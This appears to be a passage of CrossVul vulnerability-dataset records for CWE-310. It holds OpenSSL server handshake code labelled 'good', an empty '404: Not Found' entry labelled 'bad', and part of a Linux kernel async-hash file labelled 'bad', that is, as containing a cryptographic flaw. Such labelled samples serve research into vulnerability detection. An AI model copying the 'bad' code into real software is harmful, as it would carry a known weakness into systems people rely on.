if (alg_a & SSL_aGOST94)
pk = s->cert->pkeys[SSL_PKEY_GOST94].privatekey;
else if (alg_a & SSL_aGOST01)
pk = s->cert->pkeys[SSL_PKEY_GOST01].privatekey;
pkey_ctx = EVP_PKEY_CTX_new(pk,NULL);
EVP_PKEY_decrypt_init(pkey_ctx);
/* If client certificate is present and is of the same type, maybe
* use it for key exchange. Don't mind errors from
* EVP_PKEY_derive_set_peer, because it is completely valid to use
* a client certificate for authorization only. */
client_pub_pkey = X509_get_pubkey(s->session->peer);
if (client_pub_pkey)
{
if (EVP_PKEY_derive_set_peer(pkey_ctx, client_pub_pkey) <= 0)
ERR_clear_error();
}
/* Decrypt session key */
if (ASN1_get_object((const unsigned char **)&p, &Tlen, &Ttag, &Tclass, n) != V_ASN1_CONSTRUCTED ||
Ttag != V_ASN1_SEQUENCE ||
Tclass != V_ASN1_UNIVERSAL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DECRYPTION_FAILED);
goto gerr;
}
start = p;
inlen = Tlen;
if (EVP_PKEY_decrypt(pkey_ctx,premaster_secret,&outlen,start,inlen) <=0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DECRYPTION_FAILED);
goto gerr;
}
/* Generate master secret */
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,premaster_secret,32);
/* Check if pubkey from client certificate was used */
if (EVP_PKEY_CTX_ctrl(pkey_ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 2, NULL) > 0)
ret = 2;
else
ret = 1;
gerr:
EVP_PKEY_free(client_pub_pkey);
EVP_PKEY_CTX_free(pkey_ctx);
if (ret)
return ret;
else
goto err;
}
else
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_UNKNOWN_CIPHER_TYPE);
goto f_err;
}
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
#if !defined(OPENSSL_NO_DH) || !defined(OPENSSL_NO_RSA) || !defined(OPENSSL_NO_ECDH) || defined(OPENSSL_NO_SRP)
err:
#endif
#ifndef OPENSSL_NO_ECDH
EVP_PKEY_free(clnt_pub_pkey);
EC_POINT_free(clnt_ecpoint);
if (srvr_ecdh != NULL)
EC_KEY_free(srvr_ecdh);
BN_CTX_free(bn_ctx);
#endif
return(-1);
}
int ssl3_get_cert_verify(SSL *s)
{
EVP_PKEY *pkey=NULL;
unsigned char *p;
int al,ok,ret=0;
long n;
int type=0,i,j;
X509 *peer;
const EVP_MD *md = NULL;
EVP_MD_CTX mctx;
EVP_MD_CTX_init(&mctx);
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_VRFY_A,
SSL3_ST_SR_CERT_VRFY_B,
-1,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
if (s->session->peer != NULL)
{
peer=s->session->peer;
pkey=X509_get_pubkey(peer);
type=X509_certificate_type(peer,pkey);
}
else
{
peer=NULL;
pkey=NULL;
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_VERIFY)
{
s->s3->tmp.reuse_message=1;
if ((peer != NULL) && (type & EVP_PKT_SIGN))
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_MISSING_VERIFY_MESSAGE);
goto f_err;
}
ret=1;
goto end;
}
if (peer == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_NO_CLIENT_CERT_RECEIVED);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
if (!(type & EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE);
al=SSL_AD_ILLEGAL_PARAMETER;
goto f_err;
}
if (s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_CCS_RECEIVED_EARLY);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
/* we now have a signature that we need to verify */
p=(unsigned char *)s->init_msg;
/* Check for broken implementations of GOST ciphersuites */
/* If key is GOST and n is exactly 64, it is bare
* signature without length field */
if (n==64 && (pkey->type==NID_id_GostR3410_94 ||
pkey->type == NID_id_GostR3410_2001) )
{
i=64;
}
else
{
if (SSL_USE_SIGALGS(s))
{
int rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
{
al = SSL_AD_INTERNAL_ERROR;
goto f_err;
}
else if (rv == 0)
{
al = SSL_AD_DECODE_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
n2s(p,i);
n-=2;
if (i > n)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_LENGTH_MISMATCH);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
}
j=EVP_PKEY_size(pkey);
if ((i > j) || (n > j) || (n <= 0))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_WRONG_SIGNATURE_SIZE);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
if (SSL_USE_SIGALGS(s))
{
long hdatalen = 0;
void *hdata;
hdatalen = BIO_get_mem_data(s->s3->handshake_buffer, &hdata);
if (hdatalen <= 0)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_INTERNAL_ERROR);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using TLS 1.2 with client verify alg %s\n",
EVP_MD_name(md));
#endif
if (!EVP_VerifyInit_ex(&mctx, md, NULL)
|| !EVP_VerifyUpdate(&mctx, hdata, hdatalen))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_EVP_LIB);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
if (EVP_VerifyFinal(&mctx, p , i, pkey) <= 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA)
{
i=RSA_verify(NID_md5_sha1, s->s3->tmp.cert_verify_md,
MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH, p, i,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_DSA
if (pkey->type == EVP_PKEY_DSA)
{
j=DSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.dsa);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_DSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_ECDSA
if (pkey->type == EVP_PKEY_EC)
{
j=ECDSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.ec);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
#endif
if (pkey->type == NID_id_GostR3410_94 || pkey->type == NID_id_GostR3410_2001)
{ unsigned char signature[64];
int idx;
EVP_PKEY_CTX *pctx = EVP_PKEY_CTX_new(pkey,NULL);
EVP_PKEY_verify_init(pctx);
if (i!=64) {
fprintf(stderr,"GOST signature length is %d",i);
}
for (idx=0;idx<64;idx++) {
signature[63-idx]=p[idx];
}
j=EVP_PKEY_verify(pctx,signature,64,s->s3->tmp.cert_verify_md,32);
EVP_PKEY_CTX_free(pctx);
if (j<=0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,ERR_R_INTERNAL_ERROR);
al=SSL_AD_UNSUPPORTED_CERTIFICATE;
goto f_err;
}
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
end:
if (s->s3->handshake_buffer)
{
BIO_free(s->s3->handshake_buffer);
s->s3->handshake_buffer = NULL;
s->s3->flags &= ~TLS1_FLAGS_KEEP_HANDSHAKE;
}
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_free(pkey);
return(ret);
}
int ssl3_get_client_certificate(SSL *s)
{
int i,ok,al,ret= -1;
X509 *x=NULL;
unsigned long l,nc,llen,n;
const unsigned char *p,*q;
unsigned char *d;
STACK_OF(X509) *sk=NULL;
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_A,
SSL3_ST_SR_CERT_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
if (s->s3->tmp.message_type == SSL3_MT_CLIENT_KEY_EXCHANGE)
{
if ( (s->verify_mode & SSL_VERIFY_PEER) &&
(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
al=SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
/* If tls asked for a client cert, the client must return a 0 list */
if ((s->version > SSL3_VERSION) && s->s3->tmp.cert_request)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_TLS_PEER_DID_NOT_RESPOND_WITH_CERTIFICATE_LIST);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
s->s3->tmp.reuse_message=1;
return(1);
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_WRONG_MESSAGE_TYPE);
goto f_err;
}
p=d=(unsigned char *)s->init_msg;
if ((sk=sk_X509_new_null()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
n2l3(p,llen);
if (llen+3 != n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
for (nc=0; nc<llen; )
{
n2l3(p,l);
if ((l+nc+3) > llen)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
q=p;
x=d2i_X509(NULL,&p,l);
if (x == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_ASN1_LIB);
goto err;
}
if (p != (q+l))
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
if (!sk_X509_push(sk,x))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
x=NULL;
nc+=l+3;
}
if (sk_X509_num(sk) <= 0)
{
/* TLS does not mind 0 certs returned */
if (s->version == SSL3_VERSION)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_NO_CERTIFICATES_RETURNED);
goto f_err;
}
/* Fail for TLS only if we required a certificate */
else if ((s->verify_mode & SSL_VERIFY_PEER) &&
(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
al=SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
/* No client certificate so digest cached records */
if (s->s3->handshake_buffer && !ssl3_digest_cached_records(s))
{
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
}
else
{
EVP_PKEY *pkey;
i=ssl_verify_cert_chain(s,sk);
if (i <= 0)
{
al=ssl_verify_alarm_type(s->verify_result);
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERTIFICATE_VERIFY_FAILED);
goto f_err;
}
if (i > 1)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, i);
al = SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
pkey = X509_get_pubkey(sk_X509_value(sk, 0));
if (pkey == NULL)
{
al=SSL3_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
SSL_R_UNKNOWN_CERTIFICATE_TYPE);
goto f_err;
}
EVP_PKEY_free(pkey);
}
if (s->session->peer != NULL) /* This should not be needed */
X509_free(s->session->peer);
s->session->peer=sk_X509_shift(sk);
s->session->verify_result = s->verify_result;
/* With the current implementation, sess_cert will always be NULL
* when we arrive here. */
if (s->session->sess_cert == NULL)
{
s->session->sess_cert = ssl_sess_cert_new();
if (s->session->sess_cert == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, ERR_R_MALLOC_FAILURE);
goto err;
}
}
if (s->session->sess_cert->cert_chain != NULL)
sk_X509_pop_free(s->session->sess_cert->cert_chain, X509_free);
s->session->sess_cert->cert_chain=sk;
/* Inconsistency alert: cert_chain does *not* include the
* peer's own certificate, while we do include it in s3_clnt.c */
sk=NULL;
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
if (x != NULL) X509_free(x);
if (sk != NULL) sk_X509_pop_free(sk,X509_free);
return(ret);
}
int ssl3_send_server_certificate(SSL *s)
{
CERT_PKEY *cpk;
if (s->state == SSL3_ST_SW_CERT_A)
{
cpk=ssl_get_server_send_pkey(s);
if (cpk == NULL)
{
/* VRS: allow null cert if auth == KRB5 */
if ((s->s3->tmp.new_cipher->algorithm_auth != SSL_aKRB5) ||
(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE,ERR_R_INTERNAL_ERROR);
return(0);
}
}
if (!ssl3_output_cert_chain(s,cpk))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE,ERR_R_INTERNAL_ERROR);
return(0);
}
s->state=SSL3_ST_SW_CERT_B;
}
/* SSL3_ST_SW_CERT_B */
return ssl_do_write(s);
}
#ifndef OPENSSL_NO_TLSEXT
/* send a new session ticket (not necessarily for a new session) */
int ssl3_send_newsession_ticket(SSL *s)
{
if (s->state == SSL3_ST_SW_SESSION_TICKET_A)
{
unsigned char *p, *senc, *macstart;
const unsigned char *const_p;
int len, slen_full, slen;
SSL_SESSION *sess;
unsigned int hlen;
EVP_CIPHER_CTX ctx;
HMAC_CTX hctx;
SSL_CTX *tctx = s->initial_ctx;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char key_name[16];
/* get session encoding length */
slen_full = i2d_SSL_SESSION(s->session, NULL);
/* Some length values are 16 bits, so forget it if session is
* too long
*/
if (slen_full > 0xFF00)
return -1;
senc = OPENSSL_malloc(slen_full);
if (!senc)
return -1;
p = senc;
i2d_SSL_SESSION(s->session, &p);
/* create a fresh copy (not shared with other threads) to clean up */
const_p = senc;
sess = d2i_SSL_SESSION(NULL, &const_p, slen_full);
if (sess == NULL)
{
OPENSSL_free(senc);
return -1;
}
sess->session_id_length = 0; /* ID is irrelevant for the ticket */
slen = i2d_SSL_SESSION(sess, NULL);
if (slen > slen_full) /* shouldn't ever happen */
{
OPENSSL_free(senc);
return -1;
}
p = senc;
i2d_SSL_SESSION(sess, &p);
SSL_SESSION_free(sess);
/*-
* Grow buffer if need be: the length calculation is as
* follows handshake_header_length +
* 4 (ticket lifetime hint) + 2 (ticket length) +
* 16 (key name) + max_iv_len (iv length) +
* session_length + max_enc_block_size (max encrypted session
* length) + max_md_size (HMAC).
*/
if (!BUF_MEM_grow(s->init_buf,
SSL_HM_HEADER_LENGTH(s) + 22 + EVP_MAX_IV_LENGTH +
EVP_MAX_BLOCK_LENGTH + EVP_MAX_MD_SIZE + slen))
return -1;
p = ssl_handshake_start(s);
EVP_CIPHER_CTX_init(&ctx);
HMAC_CTX_init(&hctx);
/* Initialize HMAC and cipher contexts. If callback present
* it does all the work otherwise use generated values
* from parent ctx.
*/
if (tctx->tlsext_ticket_key_cb)
{
if (tctx->tlsext_ticket_key_cb(s, key_name, iv, &ctx,
&hctx, 1) < 0)
{
OPENSSL_free(senc);
return -1;
}
}
else
{
RAND_pseudo_bytes(iv, 16);
EVP_EncryptInit_ex(&ctx, EVP_aes_128_cbc(), NULL,
tctx->tlsext_tick_aes_key, iv);
HMAC_Init_ex(&hctx, tctx->tlsext_tick_hmac_key, 16,
tlsext_tick_md(), NULL);
memcpy(key_name, tctx->tlsext_tick_key_name, 16);
}
/* Ticket lifetime hint (advisory only):
* We leave this unspecified for resumed session (for simplicity),
* and guess that tickets for new sessions will live as long
* as their sessions. */
l2n(s->hit ? 0 : s->session->timeout, p);
/* Skip ticket length for now */
p += 2;
/* Output key name */
macstart = p;
memcpy(p, key_name, 16);
p += 16;
/* output IV */
memcpy(p, iv, EVP_CIPHER_CTX_iv_length(&ctx));
p += EVP_CIPHER_CTX_iv_length(&ctx);
/* Encrypt session data */
EVP_EncryptUpdate(&ctx, p, &len, senc, slen);
p += len;
EVP_EncryptFinal(&ctx, p, &len);
p += len;
EVP_CIPHER_CTX_cleanup(&ctx);
HMAC_Update(&hctx, macstart, p - macstart);
HMAC_Final(&hctx, p, &hlen);
HMAC_CTX_cleanup(&hctx);
p += hlen;
/* Now write out lengths: p points to end of data written */
/* Total length */
len = p - ssl_handshake_start(s);
ssl_set_handshake_header(s, SSL3_MT_NEWSESSION_TICKET, len);
/* Skip ticket lifetime hint */
p = ssl_handshake_start(s) + 4;
s2n(len - 6, p);
s->state=SSL3_ST_SW_SESSION_TICKET_B;
OPENSSL_free(senc);
}
/* SSL3_ST_SW_SESSION_TICKET_B */
return ssl_do_write(s);
}
int ssl3_send_cert_status(SSL *s)
{
if (s->state == SSL3_ST_SW_CERT_STATUS_A)
{
unsigned char *p;
/*-
* Grow buffer if need be: the length calculation is as
* follows 1 (message type) + 3 (message length) +
* 1 (ocsp response type) + 3 (ocsp response length)
* + (ocsp response)
*/
if (!BUF_MEM_grow(s->init_buf, 8 + s->tlsext_ocsp_resplen))
return -1;
p=(unsigned char *)s->init_buf->data;
/* do the header */
*(p++)=SSL3_MT_CERTIFICATE_STATUS;
/* message length */
l2n3(s->tlsext_ocsp_resplen + 4, p);
/* status type */
*(p++)= s->tlsext_status_type;
/* length of OCSP response */
l2n3(s->tlsext_ocsp_resplen, p);
/* actual response */
memcpy(p, s->tlsext_ocsp_resp, s->tlsext_ocsp_resplen);
/* number of bytes to write */
s->init_num = 8 + s->tlsext_ocsp_resplen;
s->state=SSL3_ST_SW_CERT_STATUS_B;
s->init_off = 0;
}
/* SSL3_ST_SW_CERT_STATUS_B */
return(ssl3_do_write(s,SSL3_RT_HANDSHAKE));
}
# ifndef OPENSSL_NO_NEXTPROTONEG
/* ssl3_get_next_proto reads a Next Protocol Negotiation handshake message. It
* sets the next_proto member in s if found */
int ssl3_get_next_proto(SSL *s)
{
int ok;
int proto_len, padding_len;
long n;
const unsigned char *p;
/* Clients cannot send a NextProtocol message if we didn't see the
* extension in their ClientHello */
if (!s->s3->next_proto_neg_seen)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,SSL_R_GOT_NEXT_PROTO_WITHOUT_EXTENSION);
return -1;
}
n=s->method->ssl_get_message(s,
SSL3_ST_SR_NEXT_PROTO_A,
SSL3_ST_SR_NEXT_PROTO_B,
SSL3_MT_NEXT_PROTO,
514, /* See the payload format below */
&ok);
if (!ok)
return((int)n);
/* s->state doesn't reflect whether ChangeCipherSpec has been received
* in this handshake, but s->s3->change_cipher_spec does (will be reset
* by ssl3_get_finished). */
if (!s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,SSL_R_GOT_NEXT_PROTO_BEFORE_A_CCS);
return -1;
}
if (n < 2)
return 0; /* The body must be > 1 bytes long */
p=(unsigned char *)s->init_msg;
/*-
* The payload looks like:
* uint8 proto_len;
* uint8 proto[proto_len];
* uint8 padding_len;
* uint8 padding[padding_len];
*/
proto_len = p[0];
if (proto_len + 2 > s->init_num)
return 0;
padding_len = p[proto_len + 1];
if (proto_len + padding_len + 2 != s->init_num)
return 0;
s->next_proto_negotiated = OPENSSL_malloc(proto_len);
if (!s->next_proto_negotiated)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,ERR_R_MALLOC_FAILURE);
return 0;
}
memcpy(s->next_proto_negotiated, p + 1, proto_len);
s->next_proto_negotiated_len = proto_len;
return 1;
}
# endif
#endif
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_1445_5 |
crossvul-cpp_data_bad_4932_0 | 404: Not Found | ./CrossVul/dataset_final_sorted/CWE-310/c/bad_4932_0 |
crossvul-cpp_data_bad_5666_2 | /*
* Asynchronous Cryptographic Hash operations.
*
* This is the asynchronous version of hash.c with notification of
* completion via a callback.
*
* Copyright (c) 2008 Loc Ho <lho@amcc.com>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the Free
* Software Foundation; either version 2 of the License, or (at your option)
* any later version.
*
*/
#include <crypto/internal/hash.h>
#include <crypto/scatterwalk.h>
#include <linux/err.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/slab.h>
#include <linux/seq_file.h>
#include <linux/cryptouser.h>
#include <net/netlink.h>
#include "internal.h"
struct ahash_request_priv {
crypto_completion_t complete;
void *data;
u8 *result;
void *ubuf[] CRYPTO_MINALIGN_ATTR;
};
static inline struct ahash_alg *crypto_ahash_alg(struct crypto_ahash *hash)
{
return container_of(crypto_hash_alg_common(hash), struct ahash_alg,
halg);
}
static int hash_walk_next(struct crypto_hash_walk *walk)
{
unsigned int alignmask = walk->alignmask;
unsigned int offset = walk->offset;
unsigned int nbytes = min(walk->entrylen,
((unsigned int)(PAGE_SIZE)) - offset);
walk->data = kmap_atomic(walk->pg);
walk->data += offset;
if (offset & alignmask) {
unsigned int unaligned = alignmask + 1 - (offset & alignmask);
if (nbytes > unaligned)
nbytes = unaligned;
}
walk->entrylen -= nbytes;
return nbytes;
}
static int hash_walk_new_entry(struct crypto_hash_walk *walk)
{
struct scatterlist *sg;
sg = walk->sg;
walk->pg = sg_page(sg);
walk->offset = sg->offset;
walk->entrylen = sg->length;
if (walk->entrylen > walk->total)
walk->entrylen = walk->total;
walk->total -= walk->entrylen;
return hash_walk_next(walk);
}
int crypto_hash_walk_done(struct crypto_hash_walk *walk, int err)
{
unsigned int alignmask = walk->alignmask;
unsigned int nbytes = walk->entrylen;
walk->data -= walk->offset;
if (nbytes && walk->offset & alignmask && !err) {
walk->offset = ALIGN(walk->offset, alignmask + 1);
walk->data += walk->offset;
nbytes = min(nbytes,
((unsigned int)(PAGE_SIZE)) - walk->offset);
walk->entrylen -= nbytes;
return nbytes;
}
kunmap_atomic(walk->data);
crypto_yield(walk->flags);
if (err)
return err;
if (nbytes) {
walk->offset = 0;
walk->pg++;
return hash_walk_next(walk);
}
if (!walk->total)
return 0;
walk->sg = scatterwalk_sg_next(walk->sg);
return hash_walk_new_entry(walk);
}
EXPORT_SYMBOL_GPL(crypto_hash_walk_done);
int crypto_hash_walk_first(struct ahash_request *req,
struct crypto_hash_walk *walk)
{
walk->total = req->nbytes;
if (!walk->total)
return 0;
walk->alignmask = crypto_ahash_alignmask(crypto_ahash_reqtfm(req));
walk->sg = req->src;
walk->flags = req->base.flags;
return hash_walk_new_entry(walk);
}
EXPORT_SYMBOL_GPL(crypto_hash_walk_first);
int crypto_hash_walk_first_compat(struct hash_desc *hdesc,
struct crypto_hash_walk *walk,
struct scatterlist *sg, unsigned int len)
{
walk->total = len;
if (!walk->total)
return 0;
walk->alignmask = crypto_hash_alignmask(hdesc->tfm);
walk->sg = sg;
walk->flags = hdesc->flags;
return hash_walk_new_entry(walk);
}
static int ahash_setkey_unaligned(struct crypto_ahash *tfm, const u8 *key,
unsigned int keylen)
{
unsigned long alignmask = crypto_ahash_alignmask(tfm);
int ret;
u8 *buffer, *alignbuffer;
unsigned long absize;
absize = keylen + alignmask;
buffer = kmalloc(absize, GFP_KERNEL);
if (!buffer)
return -ENOMEM;
alignbuffer = (u8 *)ALIGN((unsigned long)buffer, alignmask + 1);
memcpy(alignbuffer, key, keylen);
ret = tfm->setkey(tfm, alignbuffer, keylen);
kzfree(buffer);
return ret;
}
int crypto_ahash_setkey(struct crypto_ahash *tfm, const u8 *key,
unsigned int keylen)
{
unsigned long alignmask = crypto_ahash_alignmask(tfm);
if ((unsigned long)key & alignmask)
return ahash_setkey_unaligned(tfm, key, keylen);
return tfm->setkey(tfm, key, keylen);
}
EXPORT_SYMBOL_GPL(crypto_ahash_setkey);
static int ahash_nosetkey(struct crypto_ahash *tfm, const u8 *key,
unsigned int keylen)
{
return -ENOSYS;
}
static inline unsigned int ahash_align_buffer_size(unsigned len,
unsigned long mask)
{
return len + (mask & ~(crypto_tfm_ctx_alignment() - 1));
}
static void ahash_op_unaligned_finish(struct ahash_request *req, int err)
{
struct ahash_request_priv *priv = req->priv;
if (err == -EINPROGRESS)
return;
if (!err)
memcpy(priv->result, req->result,
crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
kzfree(priv);
}
static void ahash_op_unaligned_done(struct crypto_async_request *req, int err)
{
struct ahash_request *areq = req->data;
struct ahash_request_priv *priv = areq->priv;
crypto_completion_t complete = priv->complete;
void *data = priv->data;
ahash_op_unaligned_finish(areq, err);
complete(data, err);
}
static int ahash_op_unaligned(struct ahash_request *req,
int (*op)(struct ahash_request *))
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
unsigned long alignmask = crypto_ahash_alignmask(tfm);
unsigned int ds = crypto_ahash_digestsize(tfm);
struct ahash_request_priv *priv;
int err;
priv = kmalloc(sizeof(*priv) + ahash_align_buffer_size(ds, alignmask),
(req->base.flags & CRYPTO_TFM_REQ_MAY_SLEEP) ?
GFP_KERNEL : GFP_ATOMIC);
if (!priv)
return -ENOMEM;
priv->result = req->result;
priv->complete = req->base.complete;
priv->data = req->base.data;
req->result = PTR_ALIGN((u8 *)priv->ubuf, alignmask + 1);
req->base.complete = ahash_op_unaligned_done;
req->base.data = req;
req->priv = priv;
err = op(req);
ahash_op_unaligned_finish(req, err);
return err;
}
static int crypto_ahash_op(struct ahash_request *req,
int (*op)(struct ahash_request *))
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
unsigned long alignmask = crypto_ahash_alignmask(tfm);
if ((unsigned long)req->result & alignmask)
return ahash_op_unaligned(req, op);
return op(req);
}
int crypto_ahash_final(struct ahash_request *req)
{
return crypto_ahash_op(req, crypto_ahash_reqtfm(req)->final);
}
EXPORT_SYMBOL_GPL(crypto_ahash_final);
int crypto_ahash_finup(struct ahash_request *req)
{
return crypto_ahash_op(req, crypto_ahash_reqtfm(req)->finup);
}
EXPORT_SYMBOL_GPL(crypto_ahash_finup);
int crypto_ahash_digest(struct ahash_request *req)
{
return crypto_ahash_op(req, crypto_ahash_reqtfm(req)->digest);
}
EXPORT_SYMBOL_GPL(crypto_ahash_digest);
static void ahash_def_finup_finish2(struct ahash_request *req, int err)
{
struct ahash_request_priv *priv = req->priv;
if (err == -EINPROGRESS)
return;
if (!err)
memcpy(priv->result, req->result,
crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
kzfree(priv);
}
static void ahash_def_finup_done2(struct crypto_async_request *req, int err)
{
struct ahash_request *areq = req->data;
struct ahash_request_priv *priv = areq->priv;
crypto_completion_t complete = priv->complete;
void *data = priv->data;
ahash_def_finup_finish2(areq, err);
complete(data, err);
}
static int ahash_def_finup_finish1(struct ahash_request *req, int err)
{
if (err)
goto out;
req->base.complete = ahash_def_finup_done2;
req->base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
err = crypto_ahash_reqtfm(req)->final(req);
out:
ahash_def_finup_finish2(req, err);
return err;
}
static void ahash_def_finup_done1(struct crypto_async_request *req, int err)
{
struct ahash_request *areq = req->data;
struct ahash_request_priv *priv = areq->priv;
crypto_completion_t complete = priv->complete;
void *data = priv->data;
err = ahash_def_finup_finish1(areq, err);
complete(data, err);
}
static int ahash_def_finup(struct ahash_request *req)
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
unsigned long alignmask = crypto_ahash_alignmask(tfm);
unsigned int ds = crypto_ahash_digestsize(tfm);
struct ahash_request_priv *priv;
priv = kmalloc(sizeof(*priv) + ahash_align_buffer_size(ds, alignmask),
(req->base.flags & CRYPTO_TFM_REQ_MAY_SLEEP) ?
GFP_KERNEL : GFP_ATOMIC);
if (!priv)
return -ENOMEM;
